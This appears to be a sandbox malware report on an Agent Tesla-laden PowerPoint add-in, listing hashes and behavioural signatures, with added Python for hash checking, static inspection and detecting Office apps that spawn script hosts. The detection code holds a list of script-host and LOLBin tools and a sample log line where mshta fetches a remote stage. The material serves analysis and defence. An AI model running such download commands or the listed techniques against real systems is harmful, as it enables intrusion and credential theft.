General

Target: Order Contract_signed (2NQ39NGAY0GD).ppam
Size: 8KB
Sample: 211125-ve5bfabbg7
MD5: 4d5fee148b7a8eccf48baf9e46bd0aca
SHA1: cb17124014df5d5454c9aa8d6468fe987b2a1280
SHA256: 9519fae35009182236a7050629d629cb5d4978b868f3168f1107fe4e3a3711b8
SHA512: b89fa408ff04280aa2aeed5164e89d96b8c1b05e9c2ef3d671abbbd838293296f74fa824202d1a975fb6ce3799e794557cd6a2be5d42354e2a133340d5f4edc2

Static task: static1
Behavioral task: behavioral1 (Sample: Order Contract_signed (2NQ39NGAY0GD).ppam; Resource: win7-en-20211104)
Behavioral task: behavioral2 (Sample: Order Contract_signed (2NQ39NGAY0GD).ppam; Resource: win10-en-20211014)
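Added example (not part of the report or of the sandbox's own tooling): a Python check that verifies a local copy against the hashes listed above and inspects the .ppam container statically. A .ppam is an OOXML package, i.e. a ZIP, so the presence of a vbaProject.bin part and the vbaProject content type in [Content_Types].xml is enough to confirm the add-in carries VBA without opening it in PowerPoint. The embedded file is a constructed skeleton standing in for the real sample, not the sample itself; the part names and content types are the standard OOXML ones.

```python
import hashlib
import io
import zipfile

# Hashes exactly as published in the report's General section.
REPORT_HASHES = {
    "md5": "4d5fee148b7a8eccf48baf9e46bd0aca",
    "sha1": "cb17124014df5d5454c9aa8d6468fe987b2a1280",
    "sha256": "9519fae35009182236a7050629d629cb5d4978b868f3168f1107fe4e3a3711b8",
    "sha512": "b89fa408ff04280aa2aeed5164e89d96b8c1b05e9c2ef3d671abbbd838293296f74fa824202d1a975fb6ce3799e794557cd6a2be5d42354e2a133340d5f4edc2",
}

# Content type OOXML assigns to an embedded VBA project (ppt/, word/ or xl/ vbaProject.bin).
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # vbaProject.bin is an OLE compound file


def hash_bytes(data: bytes) -> dict:
    """Compute the four digests the report lists, over the raw file bytes."""
    return {name: hashlib.new(name, data).hexdigest() for name in REPORT_HASHES}


def matches_report(data: bytes) -> dict:
    """Per-algorithm True/False: is this file the sample in the report?"""
    computed = hash_bytes(data)
    return {name: computed[name] == REPORT_HASHES[name] for name in REPORT_HASHES}


def inspect_ppam(data: bytes) -> dict:
    """Static triage of a .ppam: list parts and flag VBA indicators, executing nothing."""
    result = {"is_zip": False, "parts": [], "vba_parts": [], "vba_size": 0,
              "declares_vba_content_type": False, "vba_is_ole": False}
    if not data.startswith(ZIP_MAGIC):
        return result  # not OOXML: legacy binary .ppa, or not an Office file at all
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        result["is_zip"] = True
        result["parts"] = zf.namelist()
        result["vba_parts"] = [n for n in result["parts"] if n.lower().endswith("vbaproject.bin")]
        for name in result["vba_parts"]:
            blob = zf.read(name)
            result["vba_size"] += len(blob)
            result["vba_is_ole"] = result["vba_is_ole"] or blob.startswith(OLE_MAGIC)
        if "[Content_Types].xml" in result["parts"]:
            types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            result["declares_vba_content_type"] = VBA_CONTENT_TYPE in types_xml
    return result


def build_constructed_ppam() -> bytes:
    """CONSTRUCTED stand-in for the sample (not the real file): a minimal macro-enabled
    add-in skeleton whose vbaProject.bin is just an OLE header with no macro code."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
            '<Override PartName="/ppt/presentation.xml" '
            'ContentType="application/vnd.ms-powerpoint.addin.macroEnabled.main+xml"/>'
            '</Types>')
        zf.writestr("ppt/presentation.xml", "<p:presentation/>")
        zf.writestr("ppt/vbaProject.bin", OLE_MAGIC + b"\x00" * 56)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_ppam()
    print("hash match:", matches_report(data))
    print("container:", inspect_ppam(data))
```

Run it with the path to a quarantined copy as the only argument; with no argument it runs against the constructed skeleton. A positive `vba_parts` result on a file this small (8KB) tells you the VBA is a downloader stub, which is why the behavioral tasks below are the place to look for the real payload.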
Malware Config
Targets
Target: Order Contract_signed (2NQ39NGAY0GD).ppam (8KB; MD5, SHA1, SHA256 and SHA512 as listed under General)
Signatures

- AgentTesla: Agent Tesla is a .NET-based information stealer and remote access tool (RAT); early builds were written in Visual Basic .NET. It harvests saved credentials from browsers, mail and FTP clients and exfiltrates them to an operator-controlled mailbox or server.
- Process spawned unexpected child process: this typically indicates the parent process was compromised via an exploit or macro. The sample is a .ppam, a macro-enabled PowerPoint add-in, so VBA in the add-in is the expected launch vector; the child's image name and command line are in the process tree of the behavioral tasks.
- AgentTesla Payload: the Agent Tesla binary itself was observed during the run.
- Blocklisted process makes network request: a process the sandbox treats as having no legitimate reason to reach the network (typically an Office application or a scripting host) opened a connection. At 8KB the add-in cannot contain the .NET payload, so this is the stage that fetches it; the contacted host is the first indicator to block.
- Drops file in Drivers directory: a file was written under %SystemRoot%\System32\drivers. Check the exact path in the file-system events; user-mode software rarely writes there.
- Executes dropped EXE / Loads dropped DLL: files written during the run were then executed or loaded, consistent with a downloaded second stage rather than anything embedded in the 8KB add-in.
- Modifies Windows Firewall: the firewall configuration was changed, typically to permit the payload's outbound traffic.
- Accesses Microsoft Outlook profiles: the registry keys holding Outlook account settings and saved mail credentials were read. This is Agent Tesla's credential harvesting, not a side effect.
- Suspicious use of SetThreadContext: calling SetThreadContext on a thread of another process is the final step of process hollowing (RunPE), the injection technique Agent Tesla loaders commonly use to run the stealer inside a legitimate-looking host process.
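As an added example that is not part of the report, the following Python models the "Process spawned unexpected child process" and "Executes dropped EXE" signatures as detection logic over process-creation events, the kind of rule you would run over Sysmon Event ID 1 or EDR telemetry to catch this chain on an endpoint rather than in the sandbox. The `Key=Value|Key=Value` log format, the sample events, the Office parent list, the expected-child allowlist and the script-host list are all constructed assumptions and need tuning to your estate.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Office hosts whose children deserve scrutiny (assumed baseline).
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe", "msaccess.exe"}
# Children Office spawns on its own in a normal session; tune to your estate (assumption).
EXPECTED_CHILDREN = {"splwow64.exe", "dw20.exe", "werfault.exe", "msosync.exe", "ai.exe"}
# Script hosts and LOLBins that, as an Office child, mean macro-driven execution.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                "bitsadmin.exe", "msiexec.exe", "curl.exe"}
# User-writable locations a dropped or downloaded payload is typically run from.
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\", re.I)


@dataclass
class Alert:
    severity: str
    reason: str
    parent: str
    child: str
    command_line: str


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value|Key=Value' process-creation line (constructed format)."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def classify(event: dict) -> Optional[Alert]:
    """Return an Alert when an Office parent spawns something it should not."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child_path = event.get("Image", "")
    child = ntpath.basename(child_path).lower()
    cmd = event.get("CommandLine", "")
    if parent not in OFFICE_PARENTS or child in EXPECTED_CHILDREN:
        return None
    if child in SCRIPT_HOSTS:
        return Alert("high", "office-app-spawned-script-host", parent, child, cmd)
    if USER_WRITABLE.search(child_path):
        # Maps to the report's "Executes dropped EXE": a binary run from a path
        # the document's own process could have written to.
        return Alert("high", "office-app-ran-binary-from-user-writable-path", parent, child, cmd)
    return Alert("medium", "office-app-unexpected-child", parent, child, cmd)


def run_detection(lines) -> List[Alert]:
    """Apply classify() to every non-empty line and collect the alerts."""
    return [a for a in (classify(parse_event(l)) for l in lines if l.strip()) if a]


# CONSTRUCTED events, not taken from the sandbox run.
SAMPLE_LOG = [
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
    "|Image=C:\\Windows\\splwow64.exe|CommandLine=C:\\Windows\\splwow64.exe 12288",
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
    "|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta http://example.invalid/stage",
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
    "|Image=C:\\Users\\victim\\AppData\\Roaming\\update.exe|CommandLine=update.exe",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c dir",
]

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_LOG):
        print(f"[{alert.severity}] {alert.reason}: {alert.parent} -> {alert.child}  {alert.command_line}")
```

The printer-helper line is the benign baseline and produces nothing; the mshta line and the AppData binary both fire as high. The allowlist is deliberately short: the safer failure mode for an Office parent is a medium-severity alert you tune away, not a missed child.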